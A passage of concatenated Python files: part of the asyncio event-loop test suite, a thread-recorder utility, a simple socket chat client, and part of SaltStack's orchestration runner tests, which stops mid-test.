self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
threadRecoder.py | from utils.singleton import singleton
from utils.log import Log
import threading
import time
logger = Log()()
@singleton
class threadRecorder():
def __init__(self):
self.threads = {}
self._lock = threading.Lock()
logger.info('threadRecoder 初始化完成')
def add(self,tname,func,args,daemon):
with self._lock:
if args is not None:
a = threading.Thread(target=func,args=args,daemon=daemon)
else:
a = threading.Thread(target=func,daemon=daemon)
a.start()
self.threads[a.native_id] = [tname,a]
logger.info('[%s:%s]线程已启动,当前调起线程数: %s' % (a.native_id,tname, threading.active_count()))
def heartbeat(self):
while True:
time.sleep(180)
logger.info('%s' % threading.enumerate())
need_del = []
with self._lock:
for pid in self.threads:
if not self.threads[pid][1].is_alive():
need_del.append(pid)
for pid in need_del:
logger.info('[%s:%s]已结束' % (pid,self.threads[pid][0]))
del self.threads[pid]
op_lst = ['[%s:%s]' % (pid,self.threads[pid][0]) for pid in self.threads]
logger.info('当前调起线程数: %s, Details: %s' % (threading.active_count(), ', '.join(op_lst))) |
client.py | import socket
import threading
from sys import argv
text_colour_dict = {'green': '\033[0;32m', 'red':'\033[0;31m', 'yellow':'\033[0;33m',
'light_cyan':'\033[96m', 'light_yellow':'\033[93m',
'bright_magenta':'\033[1;35;40m'}
local_host = argv[1]
port = int(argv[2])
colour = argv[3]
colour_chosen = text_colour_dict[colour]
client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client.connect((local_host,port))
uname=input("Choose a username: ")
def recieve():
while True:
try:
msg=client.recv(1024).decode('ascii')
if msg=='Initalmsg':
client.send(uname.encode('ascii'))
else:
print(msg)
except:
print("Connection failed")
client.close()
break
def write():
while True:
msg=f'%s{uname} : {input("")}%s' % (colour_chosen, '\033[0m')
client.send(msg.encode('ascii'))
recieve_thread=threading.Thread(target=recieve)
recieve_thread.start()
write_thread=threading.Thread(target=write)
write_thread.start()
|
test_state.py | # -*- coding: utf-8 -*-
'''
Tests for the state runner
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import errno
import logging
import os
import re
import shutil
import signal
import tempfile
import time
import textwrap
import threading
# Import Salt Testing Libs
from tests.support.case import ShellCase
from tests.support.helpers import flaky, expensiveTest
from tests.support.mock import MagicMock, patch
from tests.support.paths import TMP
from tests.support.unit import skipIf
# Import Salt Libs
import salt.exceptions
import salt.utils.platform
import salt.utils.event
import salt.utils.files
import salt.utils.json
import salt.utils.stringutils
import salt.utils.yaml
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import queue
log = logging.getLogger(__name__)
@flaky
class StateRunnerTest(ShellCase):
'''
Test the state runner.
'''
def add_to_queue(self, q, cmd):
'''
helper method to add salt-run
return data to a queue
'''
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
def test_orchestrate_output(self):
'''
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
and not the full stateful return. This tests ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
'''
ret_output = self.run_run('state.orchestrate orch.simple')
bad_out = ['outputter:', ' highstate']
good_out = [' Function: salt.state',
' Result: True',
'Succeeded: 1 (changed=1)',
'Failed: 0',
'Total states run: 1']
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
assert bad_out != ret_output
# Now test that some expected good sample output is present in the return.
for item in good_out:
assert item in ret_output
def test_orchestrate_nested(self):
'''
test salt-run state.orchestrate and failhard with nested orchestration
'''
if os.path.exists('/tmp/ewu-2016-12-13'):
os.remove('/tmp/ewu-2016-12-13')
_, code = self.run_run(
'state.orchestrate nested-orch.outer',
with_retcode=True)
assert os.path.exists('/tmp/ewu-2016-12-13') is False
assert code != 0
def test_orchestrate_with_mine(self):
'''
test salt-run state.orchestrate with mine.get call in sls
'''
fail_time = time.time() + 120
self.run_run('mine.update "*"')
exp_ret = 'Succeeded: 1 (changed=1)'
while True:
ret = self.run_run('state.orchestrate orch.mine')
try:
assert exp_ret in ret
break
except AssertionError:
if time.time() > fail_time:
self.fail('"{0}" was not found in the orchestration call'.format(exp_ret))
def test_orchestrate_state_and_function_failure(self):
'''
Ensure that returns from failed minions are in the changes dict where
they belong, so they can be programatically analyzed.
See https://github.com/saltstack/salt/issues/43204
'''
self.run_run('saltutil.sync_modules')
ret = salt.utils.json.loads(
'\n'.join(
self.run_run('state.orchestrate orch.issue43204 --out=json')
)
)
# Drill down to the changes dict
state_ret = ret['data']['master']['salt_|-Step01_|-Step01_|-state']['changes']
func_ret = ret['data']['master']['salt_|-Step02_|-runtests_helpers.nonzero_retcode_return_false_|-function']['changes']
# Remove duration and start time from the results, since they would
# vary with each run and that would make it impossible to test.
for item in ('duration', 'start_time'):
state_ret['ret']['minion']['test_|-test fail with changes_|-test fail with changes_|-fail_with_changes'].pop(item)
self.assertEqual(
state_ret,
{
'out': 'highstate',
'ret': {
'minion': {
'test_|-test fail with changes_|-test fail with changes_|-fail_with_changes': {
'__id__': 'test fail with changes',
'__run_num__': 0,
'__saltfunc__': 'test.fail_with_changes',
'__sls__': 'orch.issue43204.fail_with_changes',
'changes': {
'testing': {
'new': 'Something pretended to change',
'old': 'Unchanged'
}
},
'comment': 'Failure!',
'name': 'test fail with changes',
'result': False,
}
}
}
}
)
self.assertEqual(
func_ret,
{'out': 'highstate', 'ret': {'minion': False}}
)
def test_orchestrate_target_exists(self):
'''
test orchestration when target exists
while using multiple states
'''
ret = self.run_run('state.orchestrate orch.target-exists')
first = [' ID: core',
' Function: salt.state',
' Result: True']
second = [' ID: test-state',
' Function: salt.state',
' Result: True']
third = [' ID: cmd.run',
' Function: salt.function',
' Result: True']
ret_out = [first, second, third]
for out in ret_out:
for item in out:
assert item in ret
def test_orchestrate_retcode(self):
'''
Test orchestration with nonzero retcode set in __context__
'''
self.run_run('saltutil.sync_runners')
self.run_run('saltutil.sync_wheel')
ret = '\n'.join(self.run_run('state.orchestrate orch.retcode'))
for result in (' ID: test_runner_success\n'
' Function: salt.runner\n'
' Name: runtests_helpers.success\n'
' Result: True',
' ID: test_runner_failure\n'
' Function: salt.runner\n'
' Name: runtests_helpers.failure\n'
' Result: False',
' ID: test_wheel_success\n'
' Function: salt.wheel\n'
' Name: runtests_helpers.success\n'
' Result: True',
' ID: test_wheel_failure\n'
' Function: salt.wheel\n'
' Name: runtests_helpers.failure\n'
' Result: False'):
self.assertIn(result, ret)
def test_orchestrate_retcode_async(self):
'''
Test orchestration with nonzero retcode set in __context__ for async
'''
self.run_run('saltutil.sync_runners')
self.run_run('saltutil.sync_wheel')
ret = "\n".join(self.run_run('state.orchestrate orch.retcode_async'))
self.assertIn('Succeeded: 4 (changed=4)\n', ret)
# scrub ephemeral output
ret = re.sub(r'\d', 'x', ret)
ret = re.sub('Duration: .*', 'Duration: x', ret)
ret = re.sub('Started: .*', 'Started: x', ret)
result = textwrap.dedent('''
ID: test_runner_success
Function: salt.runner
Name: runtests_helpers.success
Result: True
Comment: Runner function 'runtests_helpers.success' executed.
Started: x
Duration: x
Changes:
----------
return:
----------
jid:
xxxxxxxxxxxxxxxxxxxx
tag:
salt/run/xxxxxxxxxxxxxxxxxxxx
----------
ID: test_wheel_sucess
Function: salt.wheel
Name: runtests_helpers.success
Result: True
Comment: wheel submitted successfully.
Started: x
Duration: x
Changes:
----------
jid:
xxxxxxxxxxxxxxxxxxxx
tag:
salt/wheel/xxxxxxxxxxxxxxxxxxxx
----------
ID: test_function_sucess
Function: salt.function
Name: runtests_helpers.success
Result: True
Comment: Function submitted successfully.
Started: x
Duration: x
Changes:
----------
jid:
xxxxxxxxxxxxxxxxxxxx
minions:
- minion
----------
ID: test_state_sucess
Function: salt.state
Result: True
Comment: State submitted successfully.
Started: x
Duration: x
Changes:
----------
jid:
xxxxxxxxxxxxxxxxxxxx
minions:
- minion
''')
self.assertIn(result, ret)
def test_orchestrate_target_doesnt_exist(self):
'''
test orchestration when target doesn't exist
while using multiple states
'''
ret = self.run_run('state.orchestrate orch.target-doesnt-exists')
first = ['No minions matched the target. No command was sent, no jid was assigned.',
' ID: core',
' Function: salt.state',
' Result: False']
second = [' ID: test-state',
' Function: salt.state',
' Result: True']
third = [' ID: cmd.run',
' Function: salt.function',
' Result: True']
ret_out = [first, second, third]
for out in ret_out:
for item in out:
assert item in ret
def test_state_event(self):
'''
test to ensure state.event
runner returns correct data
'''
q = queue.Queue(maxsize=0)
cmd = 'state.event salt/job/*/new count=1'
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
server_thread.setDaemon(True)
server_thread.start()
while q.empty():
self.run_salt('minion test.ping --static')
out = q.get()
assert expect in six.text_type(out)
server_thread.join()
def test_orchestrate_subset(self):
'''
test orchestration state using subset
'''
ret = self.run_run('state.orchestrate orch.subset', timeout=500)
def count(thing, listobj):
return sum([obj.strip() == thing for obj in listobj])
assert count('ID: test subset', ret) == 1
assert count('Succeeded: 1', ret) == 1
assert count('Failed: 0', ret) == 1
def test_orchestrate_salt_function_return_false_failure(self):
'''
Ensure that functions that only return False in the return
are flagged as failed when run as orchestrations.
See https://github.com/saltstack/salt/issues/30367
'''
self.run_run('saltutil.sync_modules')
ret = salt.utils.json.loads(
'\n'.join(
self.run_run('state.orchestrate orch.issue30367 --out=json')
)
)
# Drill down to the changes dict
state_result = ret['data']['master']['salt_|-deploy_check_|-test.false_|-function']['result']
func_ret = ret['data']['master']['salt_|-deploy_check_|-test.false_|-function']['changes']
assert state_result is False
self.assertEqual(
func_ret,
{'out': 'highstate', 'ret': {'minion': False}}
)
@skipIf(salt.utils.platform.is_windows(), '*NIX-only test')
@flaky
class OrchEventTest(ShellCase):
'''
Tests for orchestration events
'''
def setUp(self):
self.timeout = 60
self.master_d_dir = os.path.join(self.config_dir, 'master.d')
try:
os.makedirs(self.master_d_dir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
self.conf = tempfile.NamedTemporaryFile(
mode='w',
suffix='.conf',
dir=self.master_d_dir,
delete=True,
)
self.base_env = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, self.base_env)
self.addCleanup(self.conf.close)
for attr in ('timeout', 'master_d_dir', 'conf', 'base_env'):
self.addCleanup(delattr, self, attr)
# Force a reload of the configuration now that our temp config file has
# been removed.
self.addCleanup(self.run_run_plus, 'test.arg', __reload_config=True)
def alarm_handler(self, signal, frame):
raise Exception('Timeout of {0} seconds reached'.format(self.timeout))
def write_conf(self, data):
'''
Dump the config dict to the conf file
'''
self.conf.write(salt.utils.yaml.safe_dump(data, default_flow_style=False))
self.conf.flush()
@expensiveTest
def test_jid_in_ret_event(self):
'''
Test to confirm that the ret event for the orchestration contains the
jid for the jobs spawned.
'''
self.write_conf({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [self.base_env],
},
})
state_sls = os.path.join(self.base_env, 'test_state.sls')
with salt.utils.files.fopen(state_sls, 'w') as fp_:
fp_.write(salt.utils.stringutils.to_str(textwrap.dedent('''
date:
cmd.run
''')))
orch_sls = os.path.join(self.base_env, 'test_orch.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(salt.utils.stringutils.to_str(textwrap.dedent('''
date_cmd:
salt.state:
- tgt: minion
- sls: test_state
ping_minion:
salt.function:
- name: test.ping
- tgt: minion
fileserver.file_list:
salt.runner
config.values:
salt.wheel
''')))
listener = salt.utils.event.get_event(
'master',
sock_dir=self.master_opts['sock_dir'],
transport=self.master_opts['transport'],
opts=self.master_opts)
jid = self.run_run_plus(
'state.orchestrate',
'test_orch',
__reload_config=True).get('jid')
if jid is None:
raise Exception('jid missing from run_run_plus output')
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event['tag'] == 'salt/run/{0}/ret'.format(jid):
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event['data']['return']['data']['master']
for job in ret:
self.assertTrue('__jid__' in ret[job])
break
finally:
del listener
signal.alarm(0)
@expensiveTest
def test_parallel_orchestrations(self):
'''
Test to confirm that the parallel state requisite works in orch
we do this by running 10 test.sleep's of 10 seconds, and insure it only takes roughly 10s
'''
self.write_conf({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [self.base_env],
},
})
orch_sls = os.path.join(self.base_env, 'test_par_orch.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
{% for count in range(1, 20) %}
sleep {{ count }}:
module.run:
- name: test.sleep
- length: 10
- parallel: True
{% endfor %}
sleep 21:
module.run:
- name: test.sleep
- length: 10
- parallel: True
- require:
- module: sleep 1
'''))
orch_sls = os.path.join(self.base_env, 'test_par_orch.sls')
listener = salt.utils.event.get_event(
'master',
sock_dir=self.master_opts['sock_dir'],
transport=self.master_opts['transport'],
opts=self.master_opts)
start_time = time.time()
jid = self.run_run_plus(
'state.orchestrate',
'test_par_orch',
__reload_config=True).get('jid')
if jid is None:
raise Exception('jid missing from run_run_plus output')
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
# if we receive the ret for this job before self.timeout (60),
# the test is implicitly sucessful; if it were happening in serial it would be
# atleast 110 seconds.
if event['tag'] == 'salt/run/{0}/ret'.format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event['data']['return']['data']['master']
for state in ret:
data = ret[state]
# we expect each duration to be greater than 10s
self.assertTrue(data['duration'] > 10000)
break
# self confirm that the total runtime is roughly 30s (left 10s for buffer)
self.assertTrue((time.time() - start_time) < 40)
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
@expensiveTest
def test_orchestration_soft_kill(self):
'''
Test to confirm that the parallel state requisite works in orch
we do this by running 10 test.sleep's of 10 seconds, and insure it only takes roughly 10s
'''
self.write_conf({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [self.base_env],
},
})
orch_sls = os.path.join(self.base_env, 'two_stage_orch_kill.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
stage_one:
test.succeed_without_changes
stage_two:
test.fail_without_changes
'''))
listener = salt.utils.event.get_event(
'master',
sock_dir=self.master_opts['sock_dir'],
transport=self.master_opts['transport'],
opts=self.master_opts)
mock_jid = '20131219120000000000'
self.run_run('state.soft_kill {0} stage_two'.format(mock_jid))
with patch('salt.utils.jid.gen_jid', MagicMock(return_value=mock_jid)):
jid = self.run_run_plus(
'state.orchestrate',
'two_stage_orch_kill',
__reload_config=True).get('jid')
if jid is None:
raise Exception('jid missing from run_run_plus output')
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
# Ensure that stage_two of the state does not run
if event['tag'] == 'salt/run/{0}/ret'.format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event['data']['return']['data']['master']
self.assertNotIn('test_|-stage_two_|-stage_two_|-fail_without_changes', ret)
break
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
def test_orchestration_with_pillar_dot_items(self):
'''
Test to confirm when using a state file that includes other state file, if
one of those state files includes pillar related functions that will not
be pulling from the pillar cache that all the state files are available and
the file_roots has been preserved. See issues #48277 and #46986.
'''
self.write_conf({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [self.base_env],
},
})
orch_sls = os.path.join(self.base_env, 'main.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
include:
- one
- two
- three
'''))
orch_sls = os.path.join(self.base_env, 'one.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
{%- set foo = salt['saltutil.runner']('pillar.show_pillar') %}
placeholder_one:
test.succeed_without_changes
'''))
orch_sls = os.path.join(self.base_env, 'two.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
placeholder_two:
test.succeed_without_changes
'''))
orch_sls = os.path.join(self.base_env, 'three.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
placeholder_three:
test.succeed_without_changes
'''))
orch_sls = os.path.join(self.base_env, 'main.sls')
listener = salt.utils.event.get_event(
'master',
sock_dir=self.master_opts['sock_dir'],
transport=self.master_opts['transport'],
opts=self.master_opts)
jid = self.run_run_plus(
'state.orchestrate',
'main',
__reload_config=True).get('jid')
if jid is None:
raise salt.exceptions.SaltInvocationError('jid missing from run_run_plus output')
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
